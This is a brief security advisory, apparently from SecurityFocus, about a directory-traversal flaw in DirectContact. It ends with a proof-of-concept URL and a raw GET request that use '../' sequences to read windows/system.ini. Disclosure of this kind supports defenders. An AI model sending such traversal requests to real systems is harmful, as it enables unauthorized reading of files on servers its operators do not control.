11 lines
No EOL
570 B
Text
11 lines
No EOL
570 B
Text
source: https://www.securityfocus.com/bid/16849/info
|
|
|
|
DirectContact is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.
|
|
|
|
The following proof of concept is available:
|
|
|
|
http://www.example.com:[port]/..\..\..\..\windows/system.ini
|
|
|
|
GET /../../../../../../windows/system.ini HTTP/1.1 |